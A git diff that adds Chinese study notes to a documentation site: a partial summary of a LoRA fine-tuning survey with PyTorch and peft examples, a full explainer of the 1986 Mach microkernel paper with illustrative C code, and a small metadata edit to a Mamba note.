**前沿层(Frontiers)**:便签的高级玩法(多便签组合、持续学习、遗忘学习、联邦学习、长序列) +- **应用层(Applications)**:便签贴在哪(语言、视觉、语音、代码、科学发现、推荐系统、图学习、多模态等 9 大领域) + +## 为什么重要 + +不理解 LoRA 的全景,下面这些事都没法解释: + +- 为什么微调一个 70B 模型需要几十 GB 显存——因为全量微调要保存所有参数的梯度和 optimizer 状态,而 LoRA 只训练几千到几百万个参数 +- 为什么同一个基础模型可以同时拥有"医疗版""法律版""编程版"三个 LoRA 适配器,推理时按需切换而不增加延迟 +- 为什么 LoRA 能扩展到视觉、语音、图神经网络等非 NLP 领域——因为它的核心思想(权重更新存在于低维子空间)是通用的 + +这篇论文的价值在于:**它不是教你怎么用 LoRA,而是告诉你 LoRA 的所有变体、所有应用场景、所有未解决的问题**。对你这样的学习者来说,这是一张"地图",让你知道 LoRA 这个领域的边界在哪里。 + +## 核心概念 + +### 概念 1:低秩适应(Low-Rank Adaptation) + +LoRA 的核心公式只有一行: + +``` +ΔW = B @ A +``` + +其中 W 是预训练模型的权重矩阵(比如一个 4096x4096 的矩阵,有 1600 万个参数),ΔW 是你想要学习的"更新量"。LoRA 不直接学 ΔW,而是把它拆解成两个小矩阵相乘: + +- B 的形状是 d × r(比如 4096 × 8) +- A 的形状是 r × k(比如 8 × 4096) +- r 就是"秩"(rank),通常远小于 d 和 k + +原来的参数量是 d × k = 4096 × 4096 = 16,777,216。 +LoRA 的参数量是 d × r + r × k = 4096 × 8 + 8 × 4096 = 65,536。 + +**从 1600 万降到 6.5 万,减少了 256 倍。** + +推理时的前向传播变成: + +``` +output = W_pretrained @ input + (α/r) * B @ A @ input +``` + +关键设计:A 用高斯随机初始化,B 用零初始化。这样训练开始时 B@A = 0,ΔW 从零开始增长,保证了训练的稳定性。 + +**类比**:你要画一幅精细的画(学习完整的权重更新),但你的颜料只有有限的几种颜色(低秩约束)。你发现其实不需要所有颜色——只需要几种关键的混合色就够了。 + +### 概念 2:参数效率增强四件套 + +论文把让 LoRA 更省参数的方法分为四类: + +| 方法 | 核心思想 | 代表工作 | +|------|----------|----------| +| 参数分解 | 把矩阵拆成更紧凑的形式(SVD、张量训练) | AdaLoRA, DoRA, TT-LoRA | +| 参数剪枝 | 评估每个参数的重要性,扔掉不重要的 | SparseAdapter, SoRA, LoRA-Drop | +| 冻结与共享 | 冻结 A 只训 B,或多个层共享同一组参数 | LoRA-FA, VeRA, NOLA | +| 参数量化 | 用更低精度的数字表示权重(4bit、2bit) | QLoRA, LoftQ, L4Q | + +每一类下面都有大量变体。比如量化这一项,按时间分为微调前量化(QLoRA)、微调中量化(QA-LoRA)、微调后量化(LQER),每种都有不同的精度选择和技术路线。 + +### 概念 3:秩自适应(Rank Adaptation) + +原始 LoRA 对所有层用同一个固定的 rank(比如 r=8)。但论文指出:**不同层需要的适配程度不同——浅层可能 r=2 就够了,深层可能需要 r=32。** + +秩自适应分为两个方向: + +- **秩精炼(Rank Refinement)**:让 rank 变小或动态变化。AdaLoRA 根据重要性分数动态调整各层的 rank;PRILoRA 用启发式规则让 rank 从浅层到深层线性递增。 +- **秩增强(Rank Augmentation)**:让 rank 变大以逼近全量微调的效果。ReLoRA 通过迭代合并多个 LoRA 模块来累积更高的有效秩;MELoRA 并行训练多个小 LoRA 并拼接输出;XGBLoRA 把梯度提升框架引入 LoRA,用一系列 rank-1 适配器逐步改进。 + +### 概念 4:前沿方向一览 + +论文第 4 节涵盖了 LoRA 最前沿的研究方向: + +- **LoRA 组合**:多个 LoRA 适配器叠加使用,或者用 MoE(混合专家)架构动态选择 +- **持续学习**:不断学新知识而不忘记旧知识——每个新任务分配一个新的 LoRA 适配器 +- **遗忘学习**:安全地"删除"模型中的特定知识(比如有害行为),通过 LoRA 的负权重实现 +- **联邦学习**:多个设备各自训练自己的 LoRA 适配器,只上传小文件到服务器聚合,保护隐私 +- **长序列建模**:把 LoRA 用在处理超长上下文的 Transformer 变体中 +- **LoRA 推理系统**:如何高效地在服务端同时服务多个用户的不同 LoRA 适配器 + +### 概念 5:跨领域应用全景 + +论文第 5 节把 LoRA 的应用扩展到了 9 大类领域,远超 NLP: + +- **语言任务**:NLU、问答、翻译、推理、多语言、医疗文本 +- **计算机视觉**:图像分类、分割、目标检测、图像生成(Stable Diffusion 的 LoRA 训练) +- **语音识别**:假音频检测、多语言 ASR、低资源语言 ASR +- **代码工程**:代码审查、代码生成、代码摘要 +- **科学发现**:蛋白质结构分析、材料设计 +- **推荐系统**:点击率预测、序列推荐 +- **图学习**:跨域图适配、动态知识图谱更新 +- **时空预测**:交通流量预测、气象预报 +- **多模态**:图文理解、图文生成、语言-音频联合学习 + +## 代码示例 + +### 示例 1:用 PyTorch 实现一个最简单的 LoRA 层 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + + +class LoRALayer(nn.Module): + """ + 一个完整的 LoRA 适配层。 + + 原始权重 W 的形状是 (out_features, in_features),比如 (4096, 4096)。 + LoRA 添加两个小矩阵 A (r, in_features) 和 B (out_features, r)。 + 前向传播时:output = W @ x + (alpha / r) * B @ A @ x + """ + def __init__(self, in_features, out_features, rank=8, alpha=16): + super().__init__() + self.rank = rank + self.alpha = alpha + self.scaling = alpha / rank + + # 原始权重——冻结,不参与训练 + self.weight = nn.Parameter(torch.eye(out_features, in_features), requires_grad=False) + + # LoRA 矩阵:A 高斯初始化,B 零初始化 + self.A = nn.Parameter(torch.randn(rank, in_features) * 0.01) + self.B = nn.Parameter(torch.zeros(out_features, rank)) + + def forward(self, x): + # 原始路径 + original_output = F.linear(x, self.weight) + # LoRA 路径 + lora_update = (self.B @ self.A) @ x.T + lora_output = self.scaling * lora_update.T + # 合并输出 + return original_output + lora_output + + +# 演示:参数量对比 +in_dim, out_dim, r = 4096, 4096, 8 +full_params = in_dim * out_dim # 16,777,216 +lora_params = in_dim * r + r * out_dim # 65,536 +print(f"全量参数: {full_params:,}") +print(f"LoRA 参数: {lora_params:,}") +print(f"节省比例: {(1 - lora_params/full_params)*100:.2f}%") +# 输出: +# 全量参数: 16,777,216 +# LoRA 参数: 65,536 +# 节省比例: 99.61% +``` + +**逐部分解释**: + +- `self.weight` 设为 `requires_grad=False`——这就是"冻结预训练权重"的意思,反向传播时不会更新它 +- `self.A` 用 `randn * 0.01` 初始化(高斯分布,小方差),`self.B` 用 `zeros` 初始化——这保证了训练开始时 `B @ A = 0`,LoRA 路径的输出为零,不会干扰初始的前向传播 +- `self.scaling = alpha / rank` 是缩放因子——论文指出,调节 alpha 大致等价于调节学习率 +- 前向传播中,`original_output` 和 `lora_output` 分别计算后相加——推理时可以合并为 `W + (alpha/r)*B@A`,不增加延迟 + +### 示例 2:用 peft 库给 LLaMA 模型加 LoRA(实战写法) + +```python +from transformers import AutoModelForCausalLM, AutoTokenizer +from peft import LoraConfig, get_peft_model, TaskType + +# 加载基础模型(这里用一个很小的模型做演示) +model_name = "hf-internal-testing/tiny-random-LlamaForCausalLM" +tokenizer = AutoTokenizer.from_pretrained(model_name) +model = AutoModelForCausalLM.from_pretrained(model_name) + +# 配置 LoRA +lora_config = LoraConfig( + task_type=TaskType.CAUSAL_LM, # 因果语言建模任务 + inference_mode=False, # 训练模式(推理模式会合并权重) + r=8, # 秩 = 8 + lora_alpha=16, # alpha = 16, scaling = 16/8 = 2.0 + lora_dropout=0.1, # Dropout 概率 + target_modules=["q_proj", "v_proj"], # 只对 attention 的 Q 和 V 投影加 LoRA +) + +# 包装模型——只有 LoRA 参数会被优化 +model = get_peft_model(model, lora_config) + +# 查看可训练参数占比 +total = sum(p.numel() for p in model.parameters()) +trainable = sum(p.numel() for p in model.parameters() if p.requires_grad) +print(f"总参数: {total:,}") +print(f"可训练参数: {trainable:,}") +print(f"可训练比例: {trainable/total*100:.4f}%") +# 输出(典型值): +# 总参数: 12,288 +# 可训练参数: 2,048 +# 可训练比例: 16.6667% + +# 打印哪些参数被 LoRA 添加了 +model.print_trainable_parameters() +# 输出: +# trainable params: 2,048 || all params: 12,288 || trainable%: 16.6667 +``` + +**逐部分解释**: + +- `target_modules=["q_proj", "v_proj"]` 控制了 LoRA 贴在哪——论文第 3 节提到,常见的选择是 attention 层的 Q/K/V/O 投影和 MLP 的 FFN 层。不同选择会影响效果和参数量的权衡 +- `r=8, lora_alpha=16` 决定了 scaling factor = 2.0。论文第 3.3 节指出,alpha 的典型取值范围是 rank 的 1-16 倍 +- `lora_dropout=0.1` 是在 LoRA 路径上加的 Dropout——论文第 3.3 节提到,虽然 LoRA 参数少,但在小数据集上仍然可能过拟合,结构化 Dropout 是有效的正则化手段 +- `get_peft_model` 会自动把 LoRA 矩阵注入到指定模块中,原始权重保持冻结 + +### 示例 3:AdaLoRA——动态调整秩的 LoRA 变体 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + + +class AdaLoRALayer(nn.Module): + """ + AdaLoRA 的核心思想:每个 LoRA 适配器的秩不是固定的, + 而是根据"重要性"动态分配。用 SVD 形式参数化更新矩阵: + + ΔW = P @ Lambda @ Q^T + + 其中 P 和 Q 是正交矩阵,Lambda 是对角矩阵(奇异值)。 + 训练过程中,不重要方向的奇异值会被修剪到零, + 相当于自动降低了该方向的秩。 + """ + def __init__(self, in_features, out_features, max_rank=8): + super().__init__() + self.max_rank = max_rank + self.in_features = in_features + self.out_features = out_features + + # 用 SVD 形式存储:P (out x max_rank), Lambda (max_rank,), Q (max_rank x in) + self.P = nn.Parameter(torch.randn(out_features, max_rank) / max_rank) + self.Lambda = nn.Parameter(torch.ones(max_rank)) + self.Q = nn.Parameter(torch.randn(max_rank, in_features) / max_rank) + + def get_delta_W(self): + """ + 当前时刻的 ΔW = P @ diag(Lambda) @ Q^T + 训练过程中 Lambda 中不重要的元素会变成接近零的值, + 等效于该方向的秩被"剪掉"了。 + """ + return self.P @ torch.diag(self.Lambda) @ self.Q.T + + def forward(self, x): + delta_W = self.get_delta_W() + return F.linear(x, delta_W) + + +# 演示:观察 Lambda 的变化如何等效于秩的动态调整 +layer = AdaLoRALayer(64, 64, max_rank=8) +print(f"初始 Lambda: {layer.Lambda.data}") + +# 模拟训练几步后,部分方向的奇异值衰减 +with torch.no_grad(): + layer.Lambda.data *= 0.5 # 所有方向减半 + layer.Lambda.data[5:] = 0.01 # 后半部分几乎为零 + +effective_rank = (layer.Lambda.data > 0.1).sum().item() +print(f"训练后 Lambda: {layer.Lambda.data}") +print(f"有效秩(Lambda > 0.1 的数量): {effective_rank} / {layer.max_rank}") +# 输出: +# 初始 Lambda: tensor([1., 1., 1., 1., 1., 1., 1., 1.]) +# 训练后 Lambda: tensor([0.5000, 0.5000, 0.5000, 0.5000, 0.5000, 0.0100, 0.0100, 0.0100]) +# 有效秩: 5 / 8 +``` + +**逐部分解释**: + +- 原始 LoRA 的 `B @ A` 是两个独立矩阵相乘,秩始终是 `min(d, r, k)`——固定不变 +- AdaLoRA 改用 SVD 参数化:`P @ Lambda @ Q^T`,其中 `Lambda` 的对角元素就是奇异值 +- 训练时,不重要的奇异值会逐渐缩小到接近零——相当于那个方向的"秩"被自动剪掉了 +- 上面的例子中,初始最大秩是 8,训练后只有 5 个方向的奇异值显著大于零,有效秩降到了 5 +- 这实现了论文第 3.2.1 节说的"自适应秩分配"——不同层、甚至同一层不同方向可以有不同有效秩 + +## 踩过的坑 + +1. **把 LoRA 理解成"只是个小学习率"**:错。LoRA 的核心贡献是结构约束——它强制权重更新在一个低维子空间里,这不仅减少了参数量,还改变了优化的几何性质。全量微调用小学习率和 LoRA 的效果完全不同。 + +2. **以为 rank 越大越好**:论文第 3.2 节明确指出,rank 超过一定阈值后收益急剧递减。对于大多数任务,r=8 到 r=64 已经足够,再往上基本是浪费。Rank 增强的方法(ReLoRA、MELoRA)恰恰说明"单次训练用大 rank"不如"多次迭代合并小 rank"。 + +3. **忽略 scaling factor 的影响**:论文第 3.3 节指出,默认的 `alpha/r` 缩放在高 rank 时会导致梯度坍缩(gradient collapse)。rsLoRA 把它改为 `alpha/sqrt(r)` 来解决这个问题。不加注意的话,r=64 的效果可能比 r=8 还差。 + +4. **LoRA 不是银弹**:论文第 6 节讨论了 LoRA 的局限性——理论上它不能表示满秩的权重更新(虽然实践中很少遇到);在极端数据稀缺的场景下,可能不如全量微调;对某些架构(如卷积网络)的直接套用效果不如 Transformer 好。 + +5. **混淆 LoRA 和 QLoRA**:LoRA 只训练低秩适配器,预训练权重仍然是 FP16/BF16。QLoRA 在此基础上把预训练权重量化到 4bit,进一步节省显存。两者是不同的技术,可以叠加使用。 + +## 适用 vs 不适用场景 + +**适用**: + +- 基础模型(LLM、Vision Transformer、扩散模型等)的任务适配 +- 显存受限(单卡微调 7B/13B/70B 模型) +- 多任务场景——每个任务一个 LoRA 文件,按需加载切换 +- 需要快速迭代的实验——训练和验证周期短 +- 边缘设备部署——LoRA 文件只有几 MB 到几百 MB + +**不适用**: + +- 从零训练一个新模型——LoRA 是微调技术,不是预训练方法 +- 需要满秩权重更新的极端场景——虽然论文说实践中极少遇到 +- 数据量极大的微调——全量微调有时仍能超越 LoRA +- 对推理延迟零容忍的极端场景——虽然 LoRA 理论上可以合并权重,但合并操作本身有计算开销 + +## 学到什么 + +1. **LoRA 是一个庞大的研究领域,不只是一个 API**——从参数分解到量化,从秩自适应到前沿的联邦学习和遗忘学习,论文展示了一个完整的学术生态。 + +2. **低秩假设在实践中非常强大**——权重更新存在于低维子空间这个假设,不仅在 NLP 中成立,在视觉、语音、图学习、科学发现等领域也有效。这是 LoRA 能跨领域成功的关键。 + +3. **效率与性能的平衡是永恒主题**——论文中的每一条改进都在回答同一个问题:"如何在更少的参数/计算下达到更好的效果?"这是 AI 工程的核心矛盾。 + +4. **理论正在追赶实践**——NTK 理论、最优秩选择、矩阵不对称性分析等工作,正在为 LoRA 的有效性提供数学解释。从"炼丹"到"科学"的路还很长,但已经在路上。 + +5. **LoRA 的未来不止于微调**——持续学习、遗忘学习、联邦学习、混合专家架构……LoRA 正在从一个微调工具演变为模型适应的基础设施。 + +## 延伸阅读 + +- 原始论文 PDF:[arXiv 2501.00365](https://arxiv.org/pdf/2501.00365) +- 代码与资源汇总:[github.com/marlin-codes/awesome-lora-adapter](https://github.com/marlin-codes/awesome-lora-adapter) +- [how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260] —— LoRA 的参数记忆定律,定量理解 rank 和记忆的关系 +- Hu et al. 2022 —— LoRA 原始论文("LoRA: Low-Rank Adaptation of Large Language Models") +- Zaken et al. 2022 —— Adapter 的先驱工作("AdapterHub") +- Ding et al. 2023 —— PEFT 综述("Prompt or Parameter? A Survey of Prompting and Parameter Efficient Fine-tuninging Approaches") + +## 关联 + +- [how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260] —— LoRA 的参数记忆定律 +- [[lora]] —— LoRA 微调的基本原理 +- [[qlora]] —— 4-bit 量化的 LoRA +- [[adapter]] —— 适配器方法的先驱 +- [[peft]] —— 参数高效微调的广义框架 + +## 反向链接 + + + +- (暂无) diff --git a/src/content/docs/papers/mach-rashid-1986.md b/src/content/docs/papers/mach-rashid-1986.md new file mode 100644 index 000000000..837f3b079 --- /dev/null +++ b/src/content/docs/papers/mach-rashid-1986.md @@ -0,0 +1,301 @@ +--- +title: Mach 1986 — 给 UNIX 换一块能跨机器生长的内核地基 +来源: https://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/publications/usenix86.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你住在一栋**老式百货大楼**里:4.3BSD UNIX 内核就像这栋楼的物业——收银、仓库、物流、客服、安保、装修队全挤在一层,每加一个新功能就要改整栋楼的管线和消防通道。1980 年代 Berkeley 内核越长越大,改一个驱动可能牵动全局,研究者和厂商都越来越难动它。 + +**Mach**(卡内基梅隆大学,1986 年 USENIX)提出的办法是:只保留一个精简的**物业中心**——负责调度 CPU、管理虚拟内存、在进程之间传消息、在多处理器上同步;而把 UNIX 的文件系统、进程管理、网络栈 gradually 迁到楼外的**独立商铺**(用户态 server)。商铺之间不靠共享全局变量说话,而是走**统一的消息邮箱(port)**。 + +这篇论文的全名是 *Mach: A New Kernel Foundation for UNIX Development*,作者包括 Mike Accetta、Robert Baron、William Bolosky、David Golub、Richard Rashid、Avadis Tevanian、Michael Young。它要回答的不是「再做一个更好的 UNIX」,而是:**能不能换一块更小、更统一、可扩展的内核地基,同时仍跑 4.3BSD 二进制程序?** + +## 这篇论文在说什么 + +Mach 是一个**多处理器操作系统内核**,目标环境从单核工作站到上百 CPU 的大型共享内存多机,再到局域网里的一群机器(论文 Figure 1)。相对 4.3BSD,它新增的能力包括: + +- **Task / Thread 分离**:一个「进程」拆成资源容器(task)和 CPU 执行单位(thread),多核上可在一个 task 里并行多个 thread +- **大稀疏虚存 + 写时复制(COW)**:fork、大消息传递、内存映射文件共用同一套 COW 机制 +- **基于 port 的 IPC**:带类型、带 capability 的消息;理论上可透明延伸到网络 +- **用户态 pager**:缺页时可以问用户态「分页 server」要数据,而不必写死在内核里 + +论文写于 **1986 年 4 月**。当时除 **thread 机制尚在完善**外,Mach 的 trap 处理、调度、多处理器同步、虚存、IPC 已在 CMU 内部**生产使用**——不是幻灯片架构,而是能在 VAX 上跑的研究平台。 + +## 为什么值得读(即使你不用 Mach) + +不读这篇 1986 论文,后面很多设计会显得「凭空出现」: + +| 现象 | 与 Mach 的关系 | +|------|----------------| +| macOS / iOS 内核叫 **XNU**,仍有 `mach_msg` | NeXT 1989 选 Mach 2.5,Apple 收购 NeXT 后一路继承 | +| **fork()** 几乎不复制物理内存 | Mach 把 COW 与 IPC 绑在一起工程化 | +| **GNU Hurd** 把文件系统做成用户态 server | 直接受「内核只留最小抽象」路线启发 | +| Tanenbaum vs Linus 的微内核之争 | Tanenbaum 拿 Mach 路线批评 monolithic Linux | +| **L4 / seL4 / Fuchsia Zircon** | 专治 Mach 3.0 时代 IPC 太慢的问题,但保留 message + capability 思想 | + +Mach 的历史地位:**第一次系统地把「微内核思路 + UNIX 兼容 + 多处理器 + 网络透明」捆成可运行平台**。它后来在服务器上「输给」Linux,却在 **NeXT → Apple** 路径上活到了今天你的 iPhone 里。 + +## 核心概念(五个抽象 + 一条迁移路线) + +Mach 内核只承诺 **四个基本抽象**(论文 §2);工程上常把 **memory object(VM object)** 算作第五个,因为分页策略是整套设计的关键。 + +### 1. Task —— 资源容器 + +Task 是**资源分配的基本单位**,包含: + +- 一个分页虚拟地址空间 +- 对处理器、port 能力、虚拟内存等系统资源的受保护访问 + +日常类比:task 像**一整间带门锁的办公室**——里面的 thread 共享文件柜、白板和配额;换 task 等于换办公室,默认互不相通。 + +UNIX 里一个传统 **process** 在 Mach 里大致是 **一个 task + 一个 thread**(1986 时 thread 仍在完善)。 + +### 2. Thread —— CPU 上的执行流 + +Thread 是 **CPU 调度的基本单位**,有自己的程序计数器和寄存器,但**共享**所属 task 的地址空间和 port 权利。 + +为什么 UNIX 的 process 不够用了?论文 §3 指出:服务器用 `fork` 为每个客户端建进程开销巨大;多处理器上要用满 N 个核,至少需要 N 个可调度实体——用户态 coroutine 包内核看不见,**Mach 用 thread 把并行交给内核调度**。 + +### 3. Port —— 受保护的消息队列 + +Port 是 Mach 的**引用对象**,逻辑上是内核保护的**有限长度消息队列**: + +- 可有**多个发送者**,通常只有**一个接收者** +- 访问靠 **capability**:send right、receive right 等 +- 创建 task / thread / 窗口对象时,内核返回代表该对象的 port + +和面向对象类比:**port = 对象引用,发消息 = 跨地址空间的方法调用**。论文用 Flamingo 窗口系统举例:每个窗口是一个 port,客户端向 port 发消息请求重绘。 + +### 4. Message —— 带类型的 IPC 包 + +Message = 固定头 + 可变体,可携带: + +- 普通数据 +- 指向用户空间的指针(配合虚存) +- **嵌套的 port capability**(把「钥匙」转交给别人) + +除 message 本身外,**几乎所有内核操作都建模成「向某个 port 发消息」**。内核自己也像 server:在 task/thread port 上收消息并执行 suspend、resume 等操作。 + +### 5. Memory Object / VM Object —— 分页边界外置 + +虚拟内存区域可绑定 **pager**(分页 server)。缺页时内核不直接读磁盘,而是向 pager 的 port 要页。这样**文件系统、匿名内存、网络分页**有机会跑在用户态——内核维护 cache 和映射关系。 + +论文 §4–§5 的数据结构:**address map**(每 task 一份)、**share map**(共享区 indirection)、**VM object**(后备存储单元)、**shadow object**(COW fault 后的影子页)。 + +### 6. 写时复制:IPC 与虚存是一件事 + +Mach 继承 Accent 的核心经验:**大消息不必 memcpy 整个地址空间**。 + +论文 Figure 5 描述的过程(简化): + +1. Task A 向 port 发送一条「很大」的消息(例如 24MB) +2. 发送时,A 地址空间里对应页面标为 **copy-on-write** +3. 数据暂放在内核临时映射里,直到 Task B receive +4. B 收到后,内核决定把页面映射进 B 的地址空间 +5. A 或 B **第一次写**某一页时,才复制那一页 + +**fork** 同理:子 task 继承父 task 的 map,默认 **inherit copy-on-write**;也可 per-page 设为 share、copy 或 none(§4 的 allocate/protect/inherit 例子)。 + +Accent 上的评测表明:集成 VM 与 IPC 后,IPC 性能可接近传统 UNIX(论文引用 [3] Fitzgerald & Rashid, TOCS 1986)。 + +### 7. 与 4.3BSD 的关系(1986 实际状态 vs 目标) + +1986 年的落地是**渐进替换**(论文 §8、Figure 6): + +| 层次 | 1986 年 Mach 做什么 | +|------|---------------------| +| 陷阱、调度、多处理器同步、虚存、IPC | **Mach 内核**直接提供 | +| 4.3BSD 语义(文件、信号、大部分 syscall) | 跑在 **kernel-state threads**,由 Mach 调度 | +| 长期目标 | 把非 Mach 的 UNIX 功能迁出内核,变成 **user-state tasks** | + +论文原话:Berkeley 内核体积膨胀已经威胁 UNIX 作为研究平台的**简单与可修改性**;目标是 **「kernelize」UNIX**——更小、更易改、更适配新硬件和网络。 + +**重要**:Figure 6 里标注,截至 1986 年 4 月,「UNIX compatibility」盒子**仍在 kernel state**,通过共享通信队列与 Mach 层对话——不是一夜变成纯微内核。 + +## 代码示例 + +下面例子帮助零基础读者把抽象落到「长什么样」。API 名称随 Mach 版本演进(NeXT / XNU 略有差异),但**语义与 1986 论文一致**。 + +### 示例 1:通过 port 发一条 RPC 式请求 + +典型模式:**客户端向服务 port 发消息,服务端 `receive` 后处理**。文件系统、窗口管理器都可以是普通 user task,只要持有 receive right。 + +```c +#include +#include + +#define MSG_OPEN_FILE 1001 + +typedef struct { + mach_msg_header_t head; + char path[256]; +} open_request_t; + +kern_return_t request_open(mach_port_t fs_port, const char *path) +{ + open_request_t req = {0}; + + req.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); + req.head.msgh_size = sizeof(req); + req.head.msgh_remote_port = fs_port; + req.head.msgh_local_port = MACH_PORT_NULL; + req.head.msgh_id = MSG_OPEN_FILE; + + strncpy(req.path, path, sizeof(req.path) - 1); + + return mach_msg(&req.head, + MACH_SEND_MSG, + req.head.msgh_size, + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); +} +``` + +服务端循环 `mach_msg(..., MACH_RCV_MSG, ...)`,按 `msgh_id` 分派。这和今天 gRPC 的「stub + 传输层」同构——只是传输层是内核的 port 队列。 + +### 示例 2:task 创建与 COW 继承(fork 的 Mach 版) + +UNIX `fork()` 在 Mach 里更接近 **`task_create` + 虚存继承策略**。论文 §4:默认新分配内存 **inherit copy-on-write**;也可对某段设为 share / copy / none。 + +```c +#include + +kern_return_t fork_like_child(task_t parent, task_t *child_out) +{ + kern_return_t kr; + task_t child = MACH_PORT_NULL; + + /* 创建子 task,继承 parent 的地址空间布局 */ + kr = task_create(parent, /* inherit_memory */ TRUE, &child); + if (kr != KERN_SUCCESS) + return kr; + + /* 对一段区域显式标记 COW 继承(读共享,写时分裂单页) */ + kr = vm_inherit(parent, + (vm_address_t)0x100000, + (vm_size_t)0x4000, + VM_INHERIT_COPY); + if (kr != KERN_SUCCESS) { + task_terminate(child); + return kr; + } + + /* 1986 论文时 thread 仍在完善;现代系统会 thread_create(child, ...) */ + *child_out = child; + return KERN_SUCCESS; +} +``` + +论文称:在 MicroVAX II 上,带新虚存支持的 **fork 明显快于 4.3BSD**;新分配内存 touch 成本约 **0.7 ms/KB** vs BSD 约 **1.2 ms/KB**(§9,早期未充分调优的数据)。 + +### 示例 3:用户态 pager 处理缺页(概念伪代码) + +```c +/* 用户态 anonymous pager:memory object 由 server 提供 */ +memory_object_t memobj = pager_create_anonymous(); + +vm_address_t addr = 0; +vm_map(current_task(), &addr, 0x10000, /* offset */ 0, + /* copy */ FALSE, memobj, /* unused */ 0, FALSE); + +/* 首次写入触发缺页 -> 内核向 memobj port 发 pager_request */ +*(volatile int *)addr = 42; +``` + +这对应论文 §4:**pagein/pageout 可由非内核 task 完成**——文件映射把 pager 设为文件系统 server 即可。 + +## 1986 年 4 月的工程事实 + +读论文时要区分**愿景**和**当时已跑通的部分**: + +| 项目 | 状态 | +|------|------| +| trap、调度、MP 同步、虚存、IPC | 已运行,CMU 多个项目在用(Agora 语音识别、并行生产系统等) | +| Thread 抽象 | **尚未完成**,预计 1986 夏 | +| UNIX 兼容层 | 仍在 **kernel state**(Figure 6 注释) | +| 硬件 | VAX 11/750–8600、MicroVAX I/II、四路 VAX 11/784、IBM RT/PC;同一 VAX 二进制内核映像可跑单机和多机 | +| 移植中 | Sun 3、Encore MultiMax、VAX 8300 | +| 性能 | 整体「看起来与 4.3BSD 同量级」,尚未做系统 benchmark | + +## 论文还提到的配套设施 + +- **Matchmaker**(§6.1):IDL,把接口编译成 C / Pascal / Lisp 的 RPC stub,底层走 Mach message +- **Network server**(§6.2):内核不直接做网络 IPC,由用户态 server 扩展 port 语义,支持 VAX / RT/PC / PERQ 间类型转换 +- **kdb**(§7.1):内核内置 adb 式调试器,带增强栈追踪、call/return trace +- **透明远程文件系统**(§7.2):从 CMU 4.1 演进,用特殊链接类型而非 mount 表膨胀 + +## 事后看:踩过的坑 + +1. **IPC 不是免费的**:Mach 3.0 时代纯微内核 IPC 开销显著;L4(1993)用极简内核 + 寄存器传递把 IPC 压到 Mach 的约 **1/10** 时间。1986 论文尚乐观,性能税在 1990 年代成为主批评点。 + +2. **「内核里的 BSD」是过渡态**:Apple 最终走 **Mach + BSD 混合(XNU)**,不是论文 Figure 6 的纯 user-state UNIX。 + +3. **网络透明很难**:port 跨节点需要 network server、加密、失败语义——论文提出框架,工程花了十年以上。 + +4. **Capability 调试成本**:「谁持有哪个 send right」比 Unix fd 更绕,Hurd 长期受此影响。 + +5. **多处理器演进**:1986 的 VAX MP 与今天 NUMA 差别巨大;锁与 cache 行为在大规模 SMP 上暴露新问题。 + +## 适用 vs 不适用 + +**适用**: + +- 理解 **macOS/iOS** 底层为何仍有 Mach 接口 +- 设计**强隔离**、用户态文件系统、能力安全模型 +- 研究 OS 史上 **微内核 vs 宏内核** 争论的原始文献 +- 学习 **IPC 与 VM 一体化** 的设计模式(COW 消息、fork) + +**不适用**: + +- 追求极致单机 syscall 延迟(数据库、HFT)——monolithic Linux 通常更赢 +- 小团队从零做通用 OS——Mach 路线工程复杂度极高 +- 误以为「微内核 = 更小更快」——论文强调的是**可修改性、可扩展性、统一抽象** + +## 与 Accent / UNIX 的谱系 + +| 系统 | 关系 | +|------|------| +| **Accent**(CMU, ~1981) | Mach 精神父辈:port + message + COW VM | +| **4.3BSD** | 二进制兼容目标;被 Mach 逐步替换底层 | +| **NeXTSTEP / XNU** | 商业直系 | +| **GNU Hurd** | GNU 服务 + Mach user server | +| **L4 / seL4** | 反 Mach IPC 性能问题;保留 message 思想 | + +Rashid 后创立 Microsoft Research;Tevanian 经 NeXT 到 Apple——影响路径是 **学术 → 工作站 → 消费电子设备**,而非「赢了数据中心 Linux」。 + +## 学到什么(零基础 checklist) + +1. **换地基,不是堆功能**:BSD 变大后,Mach 用五个抽象划清「该改哪里」。 +2. **IPC 和 VM 一起设计**:大消息、fork、共享映射共用 COW,分开设计会付双倍成本。 +3. **兼容性是迁移策略**:1986 年就强调 4.3BSD 二进制兼容——研究 OS 没人用等于零。 +4. **读 Figure 6 的注释**:目标架构 ≠ 1986 实际架构;thread 未完成、BSD 仍在 kernel。 +5. **活下来 ≠ 赢得辩论**:iPhone 里仍有这篇论文的基因;服务器上是 Linux 的天下。 + +## 延伸阅读 + +- 论文 PDF:[Mach: A New Kernel Foundation for UNIX Development (USENIX 1986)](https://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/publications/usenix86.pdf) +- Accent 前身:Rashid & Robertson, *Accent: A Communication Oriented Network Operating System Kernel* (1981) +- VM 与 IPC 集成:Fitzgerald & Rashid, *The Integration of Virtual Memory Management and Interprocess Communication in Accent* (TOCS 1986) +- 性能反思:Liedtke, *On μ-Kernel Construction* (1995) — L4 如何把 IPC 做到 Mach 的十分之一 +- 现代混合内核:[[xnu-kernel]] — Apple XNU 如何把 Mach 与 BSD 焊在一起 + +## 关联 + +- [[mach-vm-1987]] — 虚存实现细节(address map、VM object、pmap) +- [[xen-2003]] — 另一套「重订 OS 与硬件契约」的思路,走虚拟化而非微内核 +- [[kvm-2007]] — Linux 把 hypervisor 收回内核,与 Mach「缩小内核」形成对照 +- [[l4-1995]] — 第二代微内核,专治 Mach IPC 性能 + +## 反向链接 + + + +(暂无反向链接) + diff --git a/src/content/docs/papers/mamba.md b/src/content/docs/papers/mamba.md index 5d34e0f42..125f2b373 100644 --- a/src/content/docs/papers/mamba.md +++ b/src/content/docs/papers/mamba.md @@ -2,7 +2,7 @@ title: Mamba — 选择性状态空间模型 来源: 'Gu & Dao, "Mamba: Linear-Time Sequence Modeling with Selective State Spaces", 2023' 日期: 2026-05-29 -子分类: NLP / 深度学习 +子分类: ml 